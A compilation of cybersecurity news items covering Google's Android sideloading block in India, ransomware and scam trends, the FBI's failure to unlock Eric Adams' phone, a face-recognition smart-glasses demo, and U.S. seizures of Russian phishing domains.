    *   **capa Explorer Web** is a browser-based tool that lets you interactively explore program capabilities identified by capa. It provides an easy way to analyze and visualize capa's results in your web browser. capa is a free, open-source tool by the FLARE team that extracts capabilities from executable files, helping you triage unknown files, guide reverse engineering, and hunt for malware.
    *   **Ransomware Tool Matrix** is an up-to-date list of tools used by ransomware and extortion gangs. Since these cybercriminals often reuse tools, we can use this info to hunt for threats, improve incident responses, spot patterns in their behavior, and simulate their tactics in security drills.

****🔒 Tip of the Week****

**Keep an "Ingredients List" for Your Software:** Your software is like a recipe made from various ingredients—third-party components and open-source libraries. By creating a **Software Bill of Materials (SBOM)**, a detailed list of these components, you can quickly find and fix security issues when they arise. Regularly update this list, integrate it into your development process, watch for new vulnerabilities, and educate your team about these parts. This reduces hidden risks, speeds up problem-solving, meets regulations, and builds trust through transparency.

****Conclusion****

Wow, this week really showed us that cyber threats can pop up where we least expect them—even in apps and networks we trust. The big lesson? Stay alert and always question what's in front of you. Keep learning, stay curious, and let's outsmart the bad guys together. Until next time, stay safe out there!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Top Threats and Trends (Sep 30 - Oct 6)

Google has announced that it's piloting a new security initiative that automatically blocks sideloading of potentially unsafe Android apps in India, after similar tests in Singapore, Thailand, and Brazil.
The enhanced fraud protection feature aims to keep users safe when they attempt to install malicious apps from sources other than the Google Play Store, such as web browsers, messaging apps,

Cybersecurity / Mobile Security

Google has announced that it's piloting a new security initiative that automatically blocks sideloading of potentially unsafe Android apps in India, after similar tests in Singapore, Thailand, and Brazil.

The enhanced fraud protection feature aims to keep users safe when they attempt to install malicious apps from sources other than the Google Play Store, such as web browsers, messaging apps, and file managers.

The program, which was first launched in Singapore earlier this February, has already blocked nearly 900,000 high-risk installations in the Southeast Asian nation, the tech giant said.

"This enhanced fraud protection will analyze and automatically block the installation of apps that may use sensitive permissions frequently abused for financial fraud," Eugene Liderman, director of mobile security strategy at Google, said.

It works by examining the permissions declared by a third-party app in real-time and checking for permissions that are typically abused by malicious apps to read SMS messages and notifications, and leverage the accessibility services to serve overlays and perform other malicious actions.

Should any of the permissions be declared in the app's manifest ("AndroidManifest.xml") file, Google Play Protect will intervene to automatically block the installation on the end user's Android device.

The pilot is expected to start next month and is expected to be gradually rolled out to all Android devices running Google Play services in the country.

"For developers distributing apps that may be affected by this pilot, now is a good time to review the permissions your app is requesting and ensure you're following developer best practices," Liderman said.

The development comes nearly a year after Google launched DigiKavach (meaning "digital armor") in India to combat online financial fraud and safeguard users against scams and malware.

"Through this program, we're studying the methods and modus operandi of scammers, developing and implementing countermeasures to new emerging scams, and responsibly sharing these insights with committed experts and partners, to collectively help create a safer and more secure digital ecosystem for all," Google India head Sanjay Gupta noted back in October 2023.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Blocks Unsafe Android App Sideloading in India for Improved Fraud Protection

Plus: Harvard students pack Meta’s smart glasses with privacy-invading face-recognition tech, Microsoft and the DOJ seize Russian hackers’ domains, and more.

Pig butchering, the crypto-based scammer scourge that has pulled in an estimated $75 billion from victims globally, is spreading beyond its roots in Southeast Asia, with operations proliferating across the Middle East, Eastern Europe, Latin America, and West Africa.

The UK's National Crime Agency disclosed new details about the identities of the Russian ransomware group known as Evil Corp—as well as the group's ties to Russian intelligence agencies and even its direct participation in espionage operations targeting NATO allies.

A WIRED investigation revealed how car-mounted automatic license plate reader cameras are capturing far more than just license plates, including campaign yard signs, bumper stickers, and other politically sensitive text, all examples of how a system for tracking vehicles threatens to become a broader surveillance tool.

In other news, ICE signed a $2 million contract with Paragon Solutions, a known vendor of spyware including the hacking tool Graphite. And the Pentagon is increasingly adopting handheld controllers for weapons systems in an effort provide more intuitive interfaces to soldiers who have grown up playing Xbox and PlayStation consoles.

And there's more. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

As the politics of America's biggest city have been turned upside down by the criminal charges against New York mayor Eric Adams, there's still a “significant wild card” in the corruption case against him, prosecutors said in court this week: The FBI can't manage to get into his phone.

Prosecutors in the case against Adams, which centers on alleged illegal payments the mayor received from the Turkish government, revealed that the FBI still hasn't cracked the encryption on Adams' personal phone, nearly a year after it was seized. That phone is one of three that the bureau has taken from Adams, but agents seized Adams' personal phone a day later than the other two devices he used in an official capacity. By that time, Adams had not only changed the passcode on the phone from a four digit PIN to six digits—a measure he says he took to prevent staffers from intentionally or unintentionally deleting information from the device. He also claims he immediately “forgot” that code to unlock it.

That very convenient amnesia may leave the FBI and prosecutors in a situation similar to their investigation into the San Bernardino mass shooting carried out by Syed Rizwan Farook in 2016, when the US government demanded Apple help unlock the shooter's encrypted iPhone, leading to a high-profile standoff between the Apple and the FBI. In that case, the cybersecurity firm Azimuth eventually used a closely guarded—and expensive—hacking technique to unlock the device. In Adams' case, prosecutors hinted that the FBI may have to resort to similar measures. “Decryption always catches up with encryption,” a prosecutor in the case, Hagan Scotten, told the judge.

Face recognition is one of only a few technologies that even Facebook and Google have hesitated to integrate into products like Google Glass and the Ray-Ban Meta smart glasses—and rightly so, given the privacy implications of a device that would allow anyone to look at a stranger on the street and immediately determine their phone number and home address. Now, however, a group of Harvard students has shown how easy it is to bolt that face recognition onto Meta's augmented-reality eyewear. The project, known as I-XRAY, integrates with the face-recognition service Pimeyes to let Ray-Ban Meta wearers learn the name of virtually anyone they see and then immediately scour databases of personal information to determine other info about them, including names of family members, phone numbers, and home addresses. The students say they're not releasing the code for their experiment, instead intending it as a demonstration of the privacy-invasive potential of augmented-reality devices. Point made.

If that warning about the privacy risks of AR eyewear needed more reinforcement, Meta this week also conceded to TechCrunch that it will use input from users' smart glasses to train its AI products. Initially, Meta declined to answer TechCrunch's questions about whether and how it would collect information from Ray-Ban Meta smart glasses for use as AI training data, in contrast to companies like OpenAI and Anthropic that explicitly say they don't exploit user inputs to train their AI services. A couple of days later, however, Meta confirmed to TechCrunch that it does in fact use images or video collected through its smart glasses to train its AI, but only if the user submits them to Meta's AI tools. That means anything that a user sees and asks Meta's AI chatbot to comment on or analyze will become part of Meta's massive AI-training data trove.

If you can't arrest Russian hackers, at least you can nab their web domains. That, at least, is the approach this week of the US Justice Department, which along with Microsoft and the NGO Information Sharing and Analysis Center used a lawsuit to take control of more than a hundred web domains that had been used by Russian hackers working for the Kremlin's intelligence and law enforcement agency known as the FSB. Those domains had been exploited in phishing campaigns by the Russian hacker group known as Star Blizzard, which has a history of targeting the typical victims of geopolitical spying such as journalists, think tanks, and NGOs. The domain seizures seem designed in part to head off threats of foreign interference in next month's US election. “Rebuilding infrastructure takes time, absorbs resources, and costs money,” Steven Masada, the assistant general counsel of Microsoft’s Digital Crimes Unit, said in a statement. “Today’s action impacts \[the hackers'\] operations at a critical point in time when foreign interference in US democratic processes is of utmost concern.”

Tag

#google